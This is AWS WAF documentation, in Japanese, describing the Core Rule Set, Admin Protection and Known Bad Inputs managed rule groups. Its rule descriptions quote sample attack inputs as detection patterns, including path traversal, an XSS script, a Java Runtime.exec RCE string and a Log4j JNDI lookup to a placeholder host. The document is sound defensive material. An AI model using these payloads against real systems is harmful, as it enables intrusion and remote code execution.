ベースラインルールグループ - AWS WAF、AWS Firewall Manager、AWS Shield Advanced、および AWS Shield ネットワークセキュリティディレクター
コアルールセット (CRS)管理者保護既知の不正な入力

AWS WAF の新しいコンソールエクスペリエンスのご紹介

更新されたエクスペリエンスを使用して、コンソールの任意の場所で AWS WAF 機能にアクセスできるようになりました。詳細については、「更新されたコンソールエクスペリエンスを使用する」を参照してください。

ベースラインルールグループ

ベースラインマネージドルールグループは、さまざまな一般的な脅威に対する一般的な保護を提供します。これらのルールグループを 1 つ以上選択して、リソースのベースライン保護を確立します。

コアルールセット (CRS) マネージドルールグループ

VendorName: AWS、名前: AWSManagedRulesCommonRuleSet、WCU: 700

注記

このドキュメントでは、このマネージドルールグループの最新の静的バージョンリリースについて説明します。バージョンの変更は、AWS マネージドルール変更ログ の変更ログにレポートされます。他のバージョンの情報については、API コマンド DescribeManagedRuleGroup を使用してください。

AWS マネージドルールのルールグループでのルールに関して公開される情報は、悪意のある人物にルールを回避するために必要なものを提供するのではなく、お客様にルールを使用するために必要なものを提供することを目的としています。

ここに記載されている以上の情報が必要な場合は、AWS サポート センター にお問い合わせください。

コアルールセット (CRS) ルールグループには、ウェブアプリケーションに一般的に適用可能なルールが含まれています。これにより、OWASP Top 10 などの OWASP の出版物に記載されている、リスクが高く一般的に発生するいくつかの脆弱性を含む、さまざまな脆弱性の悪用に対する保護が提供されます。すべての AWS WAF ユースケースでこのルールグループを使用することを検討してください。

このマネージドルールグループは、評価対象のウェブリクエストに保護パック (ウェブ ACL) 内のこのルールグループの後に実行されるルールでも使用できるラベルを追加します。AWS WAF は、Amazon CloudWatch メトリクスにもラベルを記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストのラベル付け」および「ラベルメトリクスとディメンション」を参照してください。

ルール名 説明とラベル
NoUserAgent_HEADER

HTTP User-Agent ヘッダーが欠落しているリクエストを検査します。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:NoUserAgent_Header]
UserAgent_BadBots_HEADER

リクエストが不正なボットであることを示す一般的な User-Agent ヘッダー値を検査します。パターンの例には、nessusnmap などがあります。ボット管理については、「AWS WAF Bot Control ルールグループ」も参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:BadBots_Header]
SizeRestrictions_QUERYSTRING

2,048 バイトを超える URI クエリ文字列を検査します。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString]
SizeRestrictions_Cookie_HEADER

10,240 バイトを超える cookie ヘッダーを検査します。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header]
SizeRestrictions_BODY

8 KB (8,192 バイト) を超えるリクエストボディを検査します。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:SizeRestrictions_Body]
SizeRestrictions_URIPATH

1,024 バイトを超える URI パスを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath
EC2MetaDataSSRF_BODY

リクエストボディから Amazon EC2 メタデータを盗み出す試みがないかを検査します。

警告

このルールは、保護パック (ウェブ ACL) とリソースタイプのボディサイズ制限に達するリクエストボディのみを検査します。Application Load Balancer と AWS AppSync の場合、その制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB で、保護パック (ウェブ ACL) 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body
EC2MetaDataSSRF_COOKIE

リクエスト cookie から Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie
EC2MetaDataSSRF_URIPATH

リクエスト URI パスから Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath
EC2MetaDataSSRF_QUERYARGUMENTS

リクエストクエリ引数から Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments
GenericLFI_QUERYARGUMENTS

クエリ引数に、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments
GenericLFI_URIPATH

URI パスに、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_URIPath
GenericLFI_BODY

リクエストボディに、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

警告

このルールは、保護パック (ウェブ ACL) とリソースタイプのボディサイズ制限に達するリクエストボディのみを検査します。Application Load Balancer と AWS AppSync の場合、その制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB で、保護パック (ウェブ ACL) 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:GenericLFI_Body]
RestrictedExtensions_URIPATH

読み取りや実行が安全でないシステムファイルの拡張子が URI パスに含まれているリクエストを検査します。パターンの例には、.log.ini などの拡張子があります。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath]
RestrictedExtensions_QUERYARGUMENTS

クエリ引数に、読み取りや実行が安全でないシステムファイル拡張子が含まれているリクエストを検査します。パターンの例には、.log.ini などの拡張子があります。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments]
GenericRFI_QUERYARGUMENTS

IPv4 アドレスを含む URL を埋め込むことにより、Web アプリケーションでRFI (リモートファイルインクルード) を悪用しようとする試みに対して、すべてのクエリパラメーターの値を検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments]
GenericRFI_BODY

IPv4 アドレスを含む URL を埋め込むことにより、ウェブアプリケーションの RFI (リモートファイルインクルージョン) を悪用しようとする試行に対してリクエストボディを検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

警告

このルールは、保護パック (ウェブ ACL) とリソースタイプのボディサイズ制限に達するリクエストボディのみを検査します。Application Load Balancer と AWS AppSync の場合、その制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB で、保護パック (ウェブ ACL) 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:GenericRFI_Body]
GenericRFI_URIPATH

IPv4 アドレスを含む URL を埋め込むことにより、ウェブアプリケーションの RFI (リモートファイルインクルージョン) を悪用しようとする試行に対してURI パスを検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:GenericRFI_URIPath]
CrossSiteScripting_COOKIE

組み込み AWS WAF クロスサイトスクリプティング攻撃ルールステートメント を使用して、一般的なクロスサイトスクリプティング (XSS) パターンの cookie ヘッダーの値を検査します。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、AWS WAF ログのルール一致の詳細は入力されません。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie]
CrossSiteScripting_QUERYARGUMENTS

組み込み AWS WAF クロスサイトスクリプティング攻撃ルールステートメント を使用して、一般的なクロスサイトスクリプティング (XSS) パターンのkクエリ引数の値を検査します。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、AWS WAF ログのルール一致の詳細は入力されません。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments]
CrossSiteScripting_BODY

組み込み AWS WAF クロスサイトスクリプティング攻撃ルールステートメント を使用して、一般的なクロスサイトスクリプティング (XSS) パターンのリクエスト本文を検査します。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、AWS WAF ログのルール一致の詳細は入力されません。

警告

このルールは、保護パック (ウェブ ACL) とリソースタイプのボディサイズ制限に達するリクエストボディのみを検査します。Application Load Balancer と AWS AppSync の場合、その制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB で、保護パック (ウェブ ACL) 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body]
CrossSiteScripting_URIPATH

組み込み AWS WAF クロスサイトスクリプティング攻撃ルールステートメント を使用して、一般的なクロスサイトスクリプティング (XSS) パターンの URI パスの値を検査します。パターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、AWS WAF ログのルール一致の詳細は入力されません。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath

管理者保護マネージドルールグループ

VendorName: AWS、名前: AWSManagedRulesAdminProtectionRuleSet、WCU: 100

注記

このドキュメントでは、このマネージドルールグループの最新の静的バージョンリリースについて説明します。バージョンの変更は、AWS マネージドルール変更ログ の変更ログにレポートされます。他のバージョンの情報については、API コマンド DescribeManagedRuleGroup を使用してください。

AWS マネージドルールのルールグループでのルールに関して公開される情報は、悪意のある人物にルールを回避するために必要なものを提供するのではなく、お客様にルールを使用するために必要なものを提供することを目的としています。

ここに記載されている以上の情報が必要な場合は、AWS サポート センター にお問い合わせください。

管理者保護ルールグループには、公開されている管理ページへの外部アクセスをブロックするためのルールが含まれています。これは、サードパーティーのソフトウェアを実行している場合や、悪意のあるアクターがアプリケーションへの管理アクセスを得るリスクを緩和したい場合に便利です。

このマネージドルールグループは、評価対象のウェブリクエストに保護パック (ウェブ ACL) 内のこのルールグループの後に実行されるルールでも使用できるラベルを追加します。AWS WAF は、Amazon CloudWatch メトリクスにもラベルを記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストのラベル付け」および「ラベルメトリクスとディメンション」を参照してください。

ルール名 説明とラベル
AdminProtection_URIPATH

一般的にウェブサーバーまたはアプリケーションの管理用に確保されている URI パスの有無を検査します。パターンの例には、sqlmanager などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:admin-protection:AdminProtection_URIPath

既知の不正な入力マネージドルールグループ

VendorName: AWS、名前: AWSManagedRulesKnownBadInputsRuleSet、WCU: 200

注記

このドキュメントでは、このマネージドルールグループの最新の静的バージョンリリースについて説明します。バージョンの変更は、AWS マネージドルール変更ログ の変更ログにレポートされます。他のバージョンの情報については、API コマンド DescribeManagedRuleGroup を使用してください。

AWS マネージドルールのルールグループでのルールに関して公開される情報は、悪意のある人物にルールを回避するために必要なものを提供するのではなく、お客様にルールを使用するために必要なものを提供することを目的としています。

ここに記載されている以上の情報が必要な場合は、AWS サポート センター にお問い合わせください。

既知の不正な入力ルールグループには、無効であることがわかっており脆弱性の悪用または発見に関連するリクエストパターンをブロックするルールが含まれています。これにより、悪意のあるアクターが脆弱なアプリケーションを発見するリスクを緩和できます。

このマネージドルールグループは、評価対象のウェブリクエストに保護パック (ウェブ ACL) 内のこのルールグループの後に実行されるルールでも使用できるラベルを追加します。AWS WAF は、Amazon CloudWatch メトリクスにもラベルを記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストのラベル付け」および「ラベルメトリクスとディメンション」を参照してください。

ルール名 説明とラベル
JavaDeserializationRCE_HEADER

HTTP リクエストヘッダーのキーと値に、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

警告

このルールは、リクエストヘッダーの最初の 8 KB または最初の 200 個のヘッダーのうち、いずれかの制限に先に達した方のみを検査し、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header]

JavaDeserializationRCE_BODY

リクエスト本文で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

警告

このルールは、保護パック (ウェブ ACL) とリソースタイプのボディサイズ制限に達するリクエストボディのみを検査します。Application Load Balancer と AWS AppSync の場合、その制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB で、保護パック (ウェブ ACL) 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body]
JavaDeserializationRCE_URIPATH

リクエスト URI で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath]
JavaDeserializationRCE_QUERYSTRING

リクエストクエリ文字列で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString
Host_localhost_HEADER

リクエストのホストヘッダーに、localhost を示すパターンがないかを検査します。パターンの例には、localhost などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header
PROPFIND_METHOD

リクエストの HTTP メソッドに、PROPFIND がないかを検査します。このメソッドは HEAD と同様ですが、XML オブジェクトを抽出しようとする点が異なります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Propfind_Method
ExploitablePaths_URIPATH

URI パスに、悪用可能なウェブアプリケーションパスにアクセスする試みがないかを検査します。パターンの例には、web-inf などのパスがあります。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath]
Log4JRCE_HEADER

リクエストヘッダーのキーと値に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

警告

このルールは、リクエストヘッダーの最初の 8 KB または最初の 200 個のヘッダーのうち、いずれかの制限に先に達した方のみを検査し、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header]
Log4JRCE_QUERYSTRING

クエリ文字列に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString]
Log4JRCE_BODY

本文に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

警告

このルールは、保護パック (ウェブ ACL) とリソースタイプのボディサイズ制限に達するリクエストボディのみを検査します。Application Load Balancer と AWS AppSync の場合、その制限は 8 KB に固定されます。CloudFront、API Gateway、Amazon Cognito、App Runner、Verified Access の場合、デフォルトの制限は 16 KB で、保護パック (ウェブ ACL) 設定で制限を最大 64 KB に増やすことができます。このルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「AWS WAF のオーバーサイズウェブリクエストコンポーネント」を参照してください。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body]
Log4JRCE_URIPATH

URI パスに Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

ルールアクション: Block

[ラベル:awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath]